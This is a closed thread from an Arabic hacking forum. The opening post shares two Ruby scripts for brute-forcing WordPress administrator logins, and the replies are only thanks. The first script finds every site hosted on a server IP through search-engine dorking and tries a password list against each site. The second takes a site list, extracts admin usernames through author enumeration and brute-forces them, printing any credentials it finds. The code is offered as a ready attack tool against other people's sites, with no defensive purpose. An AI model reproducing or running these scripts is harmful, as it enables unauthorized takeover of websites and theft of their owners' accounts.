حالة الموضوع:
مغلق
  1. 3ĿãS•βãĜħÐàÐ

    3ĿãS•βãĜħÐàÐ Beginner Creator Developer

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    23
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الإقامة:
    IraQ
    [​IMG]

    السلام عليكم و رحمة الله و بركاته

    بعد التحية و السلام

    حابب اقدملكم آدوات للتخمين على الوردبريس مع تخطي جميع المشاكل

    الأدوات مبرمجة بالروبي ةو تدعم multi thread للسرعة

    الأداة الأولى تقوم بالتخمين على جميع مواقع السيرفر

    [​IMG]

    كود PHP:
    #!/user/bin/ruby
    require 'net/http'
    require 'uri'
    def url(vu)
    uri URI.parse(vu)
    xs="#{uri.scheme}://#{uri.host}/#{uri.path.split('/')[1]}"
    xss="#{xs}"
    return xss
    end
    class String
    def green
    ;          "\033[32m#{self}\033[0m" end
    def bg_green
    ;       "\033[42m#{self}\033[0m" end
    end
    def xip
    (ips)
            (
    0..15).each do |xdv|
    dork="ip:#{ips}+page_id="      
    xs=URI("http://www.bing.com/search?q=#{dork}&first=#{xdv*10+1}")
    xdNet::HTTP.get_response(xs)
    body=xd.body
    sos
    =body.scan(/<cite>(.*?)<strong>/)
    return 
    sos.uniq
    end
    end
    def brut
    (urls,user,pwds)
    userz=user.chomp
    pwd
    =pwds.chomp
    ur
    =URI.parse(urls)
    pop=ur.host
    dd
    =ur.path
    http 
    Net::HTTP.new(pop80)
    #http.use_ssl = true
    path "#{dd}/wp-login.php"
    ip="http://#{pop}#{dd}/wp-admin"
    respdata http.get(pathnil)
    cookie resp.response['set-cookie']
    posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
    mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
    Thread.new {
    respdata  http.post(pathpostsmps)
    }
    y.join(0.8)
    iz="http://#{pop}#{dd}"
    if resp.code == "302"
    print"[+] #{iz} \n".green
    print"[+] Found : #{userz} => #{pwd}\n".bg_green
    end
    end
    print"[+] Wordpress All server brut force multi thread [+]\n"
    print"[+] Hamza killer Sec4ever.com :D [+]\n"
    print("# Enter IP -> ")
    ipsz=gets.chomp
    print("# Enter Username ->")
    admin=gets.chomp
    print("# Enter Password list ->")
    pass=gets.chomp
    xs
    =IO.readlines(pass)
    xsdsq=xip(ipsz)
     
    for 
    xdz in xsdsq
    dz
    =xdz.uniq
    for pdz in dz
    x
    =url("http://#{pdz}")
    print 
    "| W0rking with #{x}\n"
    for pwd in xs
    brut
    (x,admin,pwd)
     
    end
    end
    end

    [IMG]http://im37.gulfup.com/MWaWQ.png[/IMG]

    الأداة الثانية يمكنك استعمال فيها لست مواقع مع إمكانية إستخرجا لليوزر اوثو و إذ لم تعمل ضعه بنفسك

    [​IMG]

    كود PHP:
    #!/user/bin/ruby 
    require 'net/http'
    require 'net/https'
    # if site use ssl Del "#" in linge 32

    class String
    def red
    ;            "\033[31m#{self}\033[0m" end
    def green
    ;          "\033[32m#{self}\033[0m" end
    def  brown
    ;         "\033[33m#{self}\033[0m" end
    def cyan
    ;           "\033[36m#{self}\033[0m" end
    def gray
    ;           "\033[37m#{self}\033[0m" end
    def blue
    ;           "\033[34m#{self}\033[0m" end
    def bg_red
    ;         "\033[41m#{self}\033[0m" end
    def bg_green
    ;       "\033[42m#{self}\033[0m" end
    def bg_brown
    ;       "\033[43m#{self}\033[0m" end
    def bg_blue
    ;        "\033[44m#{self}\033[0m" end
    end
    class Myfucb 
    def clean
    ()
    porRUBY_PLATFORM
    if(por =~ /linux/)
     
    system("clear")
    else
     
    system("cls")
    end
    end
    def home
    ()
    print 
    "
    [*]=========================================
    [*]\n"
    .brown
    print "
    [*]      Wordpress Auto   Brut Force
    [*]\n"
    .brown
    print "
    [*]    W  W W . S E C 4 E V E R . c 0 m
    [*]\n"
    .brown
    print "
    [*]       H A M Z A    K I L L E R
    [*]\n"
    .brown
    print "
    [*]       Hlyzidi[at]gmail[dot]com
    [*]\n"
    .brown
    print "
    [*]=========================================
    [*]\n\n\n"
    .brown
    end

    def brut
    (urls,user,pwds)
    userz=user.chomp
    pwd
    =pwds.chomp
    ur
    =URI.parse(urls)
    pop=ur.host
    dd
    =ur.path
    http 
    Net::HTTP.new(pop80)
    #http.use_ssl = true 
    path "#{dd}/wp-login.php"
    ip="http://#{pop}#{dd}/wp-admin"
    respdata http.get(pathnil)
    cookie resp.response['set-cookie']
    posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
    mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
    respdata  http.post(pathpostsmps)

    iz="http://#{pop}#{dd}"
    if resp.code == "302"
    print"[+] #{iz} \n".green
    print"[+] Found : #{userz} => #{pwd}\n".bg_green
    exit
    else
    print
    "[-] Error : #{userz} =>";print"#{pwd}\r".bg_red
    end
    end
    def adminame
    (url)
    ur=URI.parse(url)
    pop=ur.host
    dd
    =ur.path
    path
    ="#{dd}?author=1"
    http Net::HTTP.new(pop,80)
    respdata http.get(pathnil)
    dz=resp.body
    po
    =dz.scan(/<title>(.*?)<\/title>/i
    for 
    dzx in po[0
      
    #mp=dzx.split('&')
     
    mpx=dzx.split('|')
     return 
    mpx[0]
    end
    end
    end
    p
    =Myfucb.new
    p.clean()
    p.home()
    print(
    "# Enter Sites File ->".cyan)
    site=gets.chomp
    print("# Enter Passwords File ->".cyan)
    pass=gets.chomp
    print("# Extect Username Atomatic (y/n)->".cyan)
    exus=gets.chomp
    sit
    =IO.readlines(site)
    pwd=IO.readlines(pass)
    p.clean()
    if 
    exus == "y"
    p.home()
    for 
    sites in (sit)
    user=p.adminame(sites)
    ur=URI.parse(sites)
    pop=ur.host
    dd
    =ur.path
    print("http://#{pop}#{dd}\n".bg_blue)
    print(
    "Username:#{user}\n".green)
    for 
    passwords in pwd
    p
    .brut(sites,user,passwords)

    end
    end
    elsif exus 
    == "n"
    p.home()
    print(
    "# Enter Username ->".cyan)
    us=gets.chomp

    for sites in (sit)
    ur=URI.parse(sites)
    pop=ur.host
    dd
    =ur.path
    print("http://#{pop}#{dd}\n".bg_blue)
    for 
    passwords in pwd
    p
    .brut(sites,us,passwords)
    end
    end
    end

    [IMG]http://im37.gulfup.com/MWaWQ.png[/IMG]

    تقولولي الأدوات مكرررين بكثرة لاكن معضمهم لا يعملون على النسخ الأخير بمشكلة

    لكويكز و اعضمهم ب php

    يعني ضعيفة شوية و هاذو مارح تجد فيههم مشاكل ابدا يمكن التخميين حتى 20000

    باسورد إذا اردت

    المهم وضعنها للأستفداة كانت برمجتهم من زمان xD

    [​IMG]

    تحياتي للجميع )5:"
     
  2. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    شكرا عزيزي عالاداة تستحق التجربة ...
     
  3. αЗѕαя

    αЗѕαя DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    152
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    بلاد الحرمين الشريفين
    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    بارك الله فيك وجعله في ميزان حسناتك

    بالتوفيق
     
  4. Attack

    Attack Developer

    الأنتساب:
    ‏27 أكتوبر 2012
    المشاركات:
    8
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    سلمت يمينـــك و دمت بكل خير
     
  5. •» яέŁάx «•

    •» яέŁάx «• Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    13
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    SaUdI aRaBIa
    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    يعطيك العافيه !:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة